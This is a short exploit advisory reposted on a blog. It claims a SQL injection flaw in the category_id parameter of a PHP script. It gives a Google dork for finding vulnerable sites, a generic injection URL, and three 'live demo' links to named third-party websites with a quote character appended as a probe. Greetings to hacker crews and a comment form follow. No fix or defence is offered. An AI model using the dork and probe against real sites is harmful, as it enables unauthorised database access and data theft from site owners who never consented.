PHP Category (category_id) SQL Injection Vulnerability

=======================================================
PHP Category (category_id) SQL Injection Vulnerability
=======================================================

######################################################################
# Exploit Title: PHP Category (category_id) SQL Injection Vulnerability
# Date: oktober 02, 2010
# Author: jos_ali_joe
# Category? : PHP Category
# Google Dork : inurl:?category.php?category_id?
######################################################################

[$] ExPLo!T : http://www.example.com/category.php?category_id={sql injection}

[$] L!ve Demo :

http://www.cloudynights.com/category.php?category_id=2%27

http://telescopereviews.com/category.php?category_id=1%27

http://www.cityofsunprairie.com/docs/category.php?category_id=1%27

######################################################################

Thanks :

./kaMtiEz ? ibl13Z ? Xrobot ? tukulesto ? N4ck0 ? R3m1ck ? jundab – asickboys- Vyc0d ? Yur4kha

./ArRay ? akatsuchi ? K4pt3N ? Gameover ? antitos ? yuki ? pokeng ? ffadill – Aury ? aphe-aphe – Alecs

./Kiddies ? pL4nkt0n ? Gunslinger_ ? andriecom ? Abu_adam ? Petimati – hakz ? Virgi ? Anharku ? TeRRenJr

Greets For :

./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker

My Team : ./Indonesian Coder

http://packetstormsecurity.org/1010-exploits/phpcategory-sql.txt

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s